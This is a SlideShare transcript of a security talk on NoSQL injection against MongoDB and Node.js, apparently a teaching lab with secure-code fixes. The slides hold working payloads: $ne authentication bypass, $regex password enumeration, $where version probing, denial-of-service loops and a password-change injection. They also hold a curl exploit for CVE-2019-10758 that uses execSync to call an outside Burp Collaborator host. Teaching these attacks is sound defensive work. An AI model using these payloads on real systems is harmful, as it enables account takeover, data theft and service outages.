Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

Share

NoSql Injection

Download to read offline

Let's review some code and understand how advanced injection attack NoSQLi occurs.

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

NoSql Injection

  1. 1. NoSql Injection By Husseni Muzkkir Date: 23/04/2020 Venue: Net Square #TechieThursday
  2. 2. #WHOAMI Security Analyst LinkedIn @hussenimuzkkir Twitter @MuzkkirHusseni Muzkkir H.
  3. 3. Agenda SQL vs NoSQL Databases NoSQL Injection LAB Creation LAB Walkthrough Insecure Coding and secure coding CVE and exploits
  4. 4. Why NoSql Database ? A relational database may require vertical and, sometimes horizontal expansion of servers. What you require is a very agile delivery system that is easily able to processes unstructured data. The system of engagement would need to be extremely dynamic. NoSQL allows for high-performance, agile processing of information at massive scale. It stores unstructured data across multiple processing nodes, as well as across multiple servers. 1. Key value Stores —> Riak, Voldemort, and Redis 2. Wide Column Stores —> Cassandra and HBase. 3. Document databases —> MongoDB and CouchDB. 4. Graph databases —> Neo4J and HyperGraphDB.
  5. 5. Data Store in SQL vs NoSQL [ { "id" : 1, "username" : "admin", "password" : "P@$$w0rD", "2FA" : "Enable" }, { "id" : 2, "username" : "user1", "password" : "123456" }, { "id" : 3, "username" : "user2" } ] id username password 2FA 1 admin P@$$w0rD Enable 2 user1 123456 null 3 user2 null null SQL Database NoSQL Database
  6. 6. Query Structure SQL: SELECT * FROM table WHERE username = ‘$username’ AND password = ‘$password’ NoSQL: db.collection.find({username: “$username”, password: “$password”}); Query Operators in NoSQL: $ne -> not equal $gt -> greater than $regex -> regular expression $where -> clause lets you specify a script to filter results
  7. 7. NoSQL Injection NoSQL Injection is security vulnerability that lets attackers take control of database queries through the unsafe use of user input. It can be used by an attacker to: Expose unauthorized information. Modify data. ➢ db.items.find(queryObject) ○ db — current database object ○ Items — collection names ‘items’ in the current database ○ find — method to execute on the collection ○ queryObject — an object used to select data
  8. 8. LAB Creation In this NoSQL Lab, I have implemented lab with actual and possible attack scenarios. 1 VM LAB Use Alpine or Ubuntu system as per requirement. Installed Dependencies MongoDB and NodeJS Installation. 2 Build Code Create possible scenarios of attack and write the code. 3 Run & Test Deploy the code and try to bypass the mechanism. 4
  9. 9. LAB Walkthrough Possible Attack Vectors: Authentication Bypass Enumeration Data manipulation MongoDB Injection DOS and more.
  10. 10. Authentication Bypass id={"$ne":0}&email=muzkkir%40net-square.com&password= ","password":{"$ne":0},"email":"muzkkir@net-square.com
  11. 11. Authentication Bypass Backend query will be: {id: {"$ne":0}, email: "muzkkir%40net-square.com", password: "", "password": {"$ne":0}, "email": "muzkkir@net-square.com" } Reason: var query = "{ "_id" : "+id+","email": ""+email+"" , "password" : ""+password+"" }"; Fix: Var query = { “_id” : id , ” email” : email , “password” : password }
  12. 12. Enumeration of Password id={"$ne":0}&email=muzkkir%40net-square.com&password=","p assword":{"$regex":"n*"},"email":"muzkkir@net-square.com
  13. 13. Enumeration of Password "Password" : { "$regex" : "n*" } "Password" : { "$regex" : "n8K*" } "Password" : { "$regex" : "n8K!3*" } "Password" : { "$regex" : "n8K!3p6" } Enumerating other users password: id={"$ne":0}&email=ravi%40net-square.com&password=","password":{"$regex":""} ,"email":"ravi@net-square.com
  14. 14. MongoDB Injection
  15. 15. MongoDB Injection { "$where": "1==1"}
  16. 16. MongoDB Injection {"$where":"function(){return(version().length=='5');}"}
  17. 17. { "$where" : "function(){ return( version()[0] == '3' );}" } { "$where" : "function(){ return( version()[1] == '.' );}" } { "$where" : "function(){ return( version()[2] == '6' );}" } { "$where" : "function(){ return( version()[3] == '.' );}" } { "$where" : "function(){ return( version()[4] == '8' );}" } Version = “3.6.8” Other Functions: sleep(500) -> Delay 5 seconds in response If else condition -> run function to retrieve more information Var i=1;while(1){use i=i+1} -> Resource Exhaustion (DOS) MongoDB Injection
  18. 18. Data Injecting to change password
  19. 19. Data Injecting to change password email=muzkkir@net-square.com&time=2:34:42","password":"123456
  20. 20. Insecure Code
  21. 21. Secure Code
  22. 22. Console Logs InSecure Coding Query… Secure Coding Query...
  23. 23. CVE-2019-10758 Vulnerability: mongo-express@0.53.0 Exploit: curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://cvbytcxi73hi1p93tya3ubmcm3stgi.burpcollaborator.net")'
  24. 24. Thanks!! hussenimuzkkir MuzkkirHusseni Muzkkir H. Net Square
  • MangeshGupta5

    May. 1, 2020

Let's review some code and understand how advanced injection attack NoSQLi occurs.

Views

Total views

283

On Slideshare

0

From embeds

0

Number of embeds

5

Actions

Downloads

191

Shares

0

Comments

0

Likes

1

×